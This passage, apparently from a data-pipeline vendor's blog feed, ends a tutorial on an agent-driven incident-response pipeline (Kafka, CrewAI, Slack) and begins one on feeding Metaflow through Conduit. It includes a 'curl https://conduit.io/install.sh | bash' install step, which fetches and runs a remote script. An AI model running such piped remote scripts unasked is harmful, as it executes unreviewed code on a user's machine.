crew &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Crew&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;agents&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;triage_agent&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; comms_agent&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; runbook_agent&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; tasks&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;tasks&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

consumer &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; KafkaConsumer&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&apos;enriched_alerts&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    bootstrap_servers&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;KAFKA_BOOTSTRAP_SERVER&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:9092&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    value_deserializer&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;lambda&lt;/span&gt; m&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;loads&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;m&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;decode&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;utf-8&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; msg &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; consumer&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    alert &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; msg&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;not&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;all&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;k &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; alert &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; k &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;summary&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;urgency&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;instance&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;warning&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;⚠️ Malformed alert: skipping&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
    responses &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; crew&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;input_data&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        slack&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;chat_postMessage&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;channel&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;channel&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; text&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;\n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;join&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;responses&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;✅ Slack notification sent&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; SlackApiError &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;❌ Slack error: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;response&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;error&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;🤖 &lt;code class=&quot;language-text&quot;&gt;crewai_runner/Dockerfile&lt;/code&gt;&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;docker&quot;&gt;&lt;pre class=&quot;language-docker&quot;&gt;&lt;code class=&quot;language-docker&quot;&gt;&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; python:3.10-slim&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;WORKDIR&lt;/span&gt; /app&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;COPY&lt;/span&gt; agent_runner.py .&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;RUN&lt;/span&gt; pip install kafka-python slack_sdk crewai openai python-dotenv&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CMD&lt;/span&gt; [&lt;span class=&quot;token string&quot;&gt;&quot;python&quot;&lt;/span&gt;, &lt;span class=&quot;token string&quot;&gt;&quot;agent_runner.py&quot;&lt;/span&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;🧪 Start the Stack&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;docker-compose&lt;/span&gt; up &lt;span class=&quot;token parameter variable&quot;&gt;--build&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then test it:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-X&lt;/span&gt; POST http://localhost:5000/alert &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;-H&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Content-Type: application/json&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{&quot;alertname&quot;: &quot;HighMemoryUsage&quot;, &quot;instance&quot;: &quot;api-1&quot;, &quot;description&quot;: &quot;Memory &gt; 90%&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;✅ Done.&lt;/h3&gt;
&lt;p&gt;You now have a working autonomous pipeline that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Accepts alerts via HTTP&lt;/li&gt;
&lt;li&gt;Streams data in real time using Kafka&lt;/li&gt;
&lt;li&gt;Enriches it with OpenAI&lt;/li&gt;
&lt;li&gt;Triggers AI agents&lt;/li&gt;
&lt;li&gt;Notifies Slack with no human in the loop&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;💥 Extend It&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Trigger &lt;a href=&quot;https://www.pagerduty.com/&quot;&gt;PagerDuty&lt;/a&gt; or &lt;a href=&quot;https://github.com/features/actions&quot;&gt;GitHub Actions&lt;/a&gt; based on agent output&lt;/li&gt;
&lt;li&gt;Route alerts by team, urgency, or region&lt;/li&gt;
&lt;li&gt;Store incident data in S3/Postgres for postmortems&lt;/li&gt;
&lt;li&gt;Add human-in-the-loop escalation if confidence is low&lt;/li&gt;
&lt;/ul&gt;
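As a concrete starting point for the routing idea, a small helper in the consumer loop could pick a Slack channel before posting. This is only a sketch: the `urgency` and `team` fields and the channel names are assumptions for illustration, not part of the demo's alert schema.

```python
def route_alert(alert: dict) -> str:
    """Pick a Slack channel from hypothetical urgency/team fields on the alert."""
    urgency = alert.get("urgency", "low").lower()
    team = alert.get("team", "platform")
    if urgency in ("critical", "high"):
        # High-urgency alerts page the owning team's incident channel directly.
        return f"#incidents-{team}"
    # Everything else lands in a shared triage queue.
    return "#alerts-triage"

print(route_alert({"urgency": "critical", "team": "payments"}))  # #incidents-payments
```

The same shape works for the other extensions: swap the returned channel for a PagerDuty service ID or a GitHub Actions workflow dispatch.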
&lt;hr&gt;
&lt;h3&gt;🧠 Takeaway&lt;/h3&gt;
&lt;p&gt;This isn’t just another monitoring pipeline. It’s the foundation of an &lt;strong&gt;autonomous incident response system&lt;/strong&gt; powered by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Conduit&lt;/strong&gt;: Real-time data movement and enrichment&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CrewAI&lt;/strong&gt;: Agentic orchestration with role-based reasoning&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka&lt;/strong&gt;: Scalable, decoupled message routing&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Slack&lt;/strong&gt;: Fast, familiar team communication&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ready to build autonomous systems that don&apos;t just think, but act? The future of incident response isn&apos;t about faster alerts — it&apos;s about intelligent systems that understand, communicate, and solve problems in real time.&lt;/p&gt;
&lt;p&gt;Your next-generation incident response system is just a few commands away. Start with this demo, then imagine what you could build when you combine:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Streaming data pipelines with &lt;a href=&quot;https://conduit.io&quot;&gt;Conduit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Autonomous agents with &lt;a href=&quot;https://crewai.com&quot;&gt;CrewAI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Real-time communication with your team&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Don&apos;t wait for the next incident. Build your autonomous response system today.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Supercharge Your Metaflow Pipelines with Conduit’s Real-Time Connectors]]></title><description><![CDATA[Learn how to integrate Conduit with Metaflow to build real-time machine learning pipelines. Stream data from Kafka to S3 and process it with Metaflow—all in one seamless workflow.]]></description><link>https://meroxa.com/blog/supercharge-your-metaflow-pipelines-with-conduits-real-time-connectors</link><guid isPermaLink="false">https://meroxa.com/blog/supercharge-your-metaflow-pipelines-with-conduits-real-time-connectors</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 22 May 2025 16:53:00 GMT</pubDate><content:encoded>&lt;p&gt;If you’ve used &lt;a href=&quot;https://metaflow.org/&quot;&gt;Metaflow&lt;/a&gt; to orchestrate data science workflows, you know how powerful and intuitive it is. But feeding those workflows with real-time data? That’s where things can get messy—especially if you’re stitching together multiple tools just to get data from Kafka into S3, or wrangling batch jobs to keep everything in sync.&lt;/p&gt;
&lt;p&gt;This post shows you how to simplify that entire process using &lt;strong&gt;&lt;a href=&quot;https://conduit.io&quot;&gt;Conduit&lt;/a&gt;&lt;/strong&gt;. Pairing Conduit with Metaflow gives you an efficient, maintainable, and reproducible data pipeline that flows from raw event to insight.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;How Conduit Fits In&lt;/h2&gt;
&lt;p&gt;Metaflow handles orchestration: steps, parameters, and execution. What it doesn’t do is handle real-time ingestion. That’s where Conduit comes in. It connects to &lt;a href=&quot;https://conduit.io/docs/using/connectors/list&quot;&gt;live sources&lt;/a&gt; (like Kafka, Postgres, MongoDB) and pushes cleaned, structured records to sinks like S3 or cloud databases. It’s lightweight, fast, and written in Go.&lt;/p&gt;
&lt;p&gt;Together, they form a clean architecture:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/2ffca0e21eac70228a4c7862d0349070/a5c81/mermaid-diagram-2025-05-22-165045.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 101%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAABwklEQVR42q2VW1PCMBCFUZSKgohavCvIjHdHpfekaXrhUkH//885bsLggwMOVB92ujNJvp7N9mxL61tH+BmlSgs7e5cQcQbXZwijWIfjBQhlilrzivaYmHt2PtBEbf8SwzxHJCPIOKanhIgiDEY56gdTYHklYHMKVOEFARjnOh+MRqjvrwykkgk4eh8jH48RCqEVqnyYvxcBmlRWm+5N4rXXAw+Fjpe3N3Aqu3HYWRG4aaJhdvSd3d/fIQw5ARlub2/oJQLNVpf2HKJcXRK4ZrSwuXOKs/bDd5x3Hr/zCq2pPUt3WUPpHstUVs/l8HkMJlK82AwbBFJri84tBKrGVHfP8fH5SaWH1BSB8WSiv89SUeAWAZOsjyTNkA36kEmK7b2L4kClUEFcz9MhZPw/CmWSIOv/k0KlyvN9BIyBi0h/8It8vJTC/nCoXRKTSqX2TwpnJfsBQ0Bejv5UsjEF5uTnJE3pDjMMaDjophgFFSpHyCSDZTuwHZfmYwqjflYMqKLauEDz6Jrs9kTWe6a8q0v+7cxCL1dqp/C4gOU4NBgi3WHLthFQvrF9spqXZ8PBcgP9C1CjfxaWx2jKHGPdmK/wC038+zSi4t0gAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Conduit to Metaflow Architecture&quot;
        title=&quot;Conduit to Metaflow Architecture&quot;
        src=&quot;/static/2ffca0e21eac70228a4c7862d0349070/5a190/mermaid-diagram-2025-05-22-165045.png&quot;
        srcset=&quot;/static/2ffca0e21eac70228a4c7862d0349070/772e8/mermaid-diagram-2025-05-22-165045.png 200w,
/static/2ffca0e21eac70228a4c7862d0349070/e17e5/mermaid-diagram-2025-05-22-165045.png 400w,
/static/2ffca0e21eac70228a4c7862d0349070/5a190/mermaid-diagram-2025-05-22-165045.png 800w,
/static/2ffca0e21eac70228a4c7862d0349070/c1b63/mermaid-diagram-2025-05-22-165045.png 1200w,
/static/2ffca0e21eac70228a4c7862d0349070/29007/mermaid-diagram-2025-05-22-165045.png 1600w,
/static/2ffca0e21eac70228a4c7862d0349070/a5c81/mermaid-diagram-2025-05-22-165045.png 2333w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;What You’ll Need&lt;/h2&gt;
&lt;p&gt;You’ll want:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Python 3.7 or higher&lt;/li&gt;
&lt;li&gt;Docker&lt;/li&gt;
&lt;li&gt;AWS CLI set up (for S3 or Batch)&lt;/li&gt;
&lt;li&gt;Conduit v0.14.0 or later&lt;/li&gt;
&lt;li&gt;Metaflow v2.7.0 or later&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Set Up Kafka Locally&lt;/h3&gt;
&lt;p&gt;If you don’t already have a Kafka cluster, here’s how to spin one up for testing:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;9092&lt;/span&gt;:9092 apache/kafka:4.0.0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
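The pipeline below reads from an `orders` topic, so you'll want some test events in it. One way is a tiny producer script; this sketch assumes the `kafka-python` package (`pip install kafka-python`) and invents the order fields purely for illustration:

```python
import json

def make_order(order_id: int, status: str, amount: float) -> bytes:
    """Serialize a sample order event; field names are invented for this demo."""
    return json.dumps(
        {"order_id": order_id, "status": status, "amount": amount}
    ).encode("utf-8")

def send_samples(bootstrap: str = "localhost:9092", topic: str = "orders") -> None:
    """Send a handful of sample orders; needs kafka-python and a running broker."""
    from kafka import KafkaProducer  # assumed dependency: pip install kafka-python
    producer = KafkaProducer(bootstrap_servers=bootstrap)
    for i in range(5):
        status = "cancelled" if i % 3 == 0 else "completed"
        producer.send(topic, make_order(i, status, round(19.99 * i, 2)))
    producer.flush()

# With the Docker broker above running, call send_samples() to populate the topic.
```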
&lt;hr&gt;
&lt;h2&gt;Getting Conduit Running&lt;/h2&gt;
&lt;p&gt;Install Conduit (choose what works for you):&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;macOS:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;brew tap conduitio/conduit
brew &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Linux / other:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; https://conduit.io/install.sh &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;bash&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To verify:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit version&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Use the &lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; command to &lt;a href=&quot;https://conduit.io/docs/getting-started#build-a-pipeline&quot;&gt;scaffold a pipeline in your preferred directory&lt;/a&gt;. Replace the default YAML file in the &lt;code class=&quot;language-text&quot;&gt;/pipelines&lt;/code&gt; directory with the YAML file below.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.2&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; orders&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;servers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:9092&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;groupID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;conduit-orders-group&quot;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; s3&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; s3
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.bucket&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-data-bucket&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-west-2&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.accessKeyId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;ACCESS_KEY&gt;&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;aws.secretAccessKey&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;SECRET_KEY&gt;&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;prefix&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders/&quot;&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;sdk.batch.delay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;10s&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then launch Conduit with the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit run&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h2&gt;Building the Metaflow Flow&lt;/h2&gt;
&lt;p&gt;Once Conduit is writing events to S3, your Metaflow script can take it from there.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; metaflow &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; FlowSpec&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; step&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Parameter
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; boto3&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; json

&lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;OrdersFlow&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;FlowSpec&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    s3_bucket &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Parameter&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;s3_bucket&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; default&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;my-data-bucket&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@step&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;start&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;self&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
